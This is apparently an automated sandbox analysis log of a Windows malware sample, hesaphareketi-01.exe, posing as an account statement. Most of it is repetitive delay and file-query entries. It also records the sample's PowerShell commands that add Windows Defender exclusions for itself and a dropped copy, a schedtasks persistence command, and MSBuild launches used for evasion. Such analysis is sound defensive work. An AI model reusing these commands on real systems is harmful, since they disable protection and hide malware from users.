Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -599453s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -599344s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -599234s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -599125s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -599015s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -598906s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -598797s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -598687s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -598578s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -598469s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -598295s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -598187s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -597555s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -597437s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -597328s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -597219s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -597109s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -597000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -596890s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -596781s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -596672s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -596562s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -596453s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -596344s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -596234s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -596125s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -596016s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -595906s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -595764s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -595656s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -595547s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -595436s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -595328s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -595219s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -595094s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -594984s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -594875s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -594765s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -594656s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -594547s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -594437s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -594328s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -594218s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -594109s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -594000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804	Thread sleep time: -593889s >= -30000s

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599655	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599321	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598650	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598421	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597655	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597201	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597090	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596852	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596692	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596524	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596072	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595836	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594952	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594296	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593858	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598797
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598687
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598469
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598295
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598187
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597555
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595764
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595436
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595094
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593889

Source: MSBuild.exe, 00000009.00000002.4699262471.0000000001116000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.
Source: MSBuild.exe, 00000010.00000002.4699689315.0000000000FBB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\hesaphareketi-01.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 9_2_06757588 LdrInitializeThunk,

9_2_06757588

Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\hesaphareketi-01.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe"
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WvaGpcFVX.exe"
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe"	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WvaGpcFVX.exe"	Jump to behavior

Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe"	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WvaGpcFVX.exe"	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp470C.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp5A94.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior

Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Queries volume information: C:\Users\user\Desktop\hesaphareketi-01.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
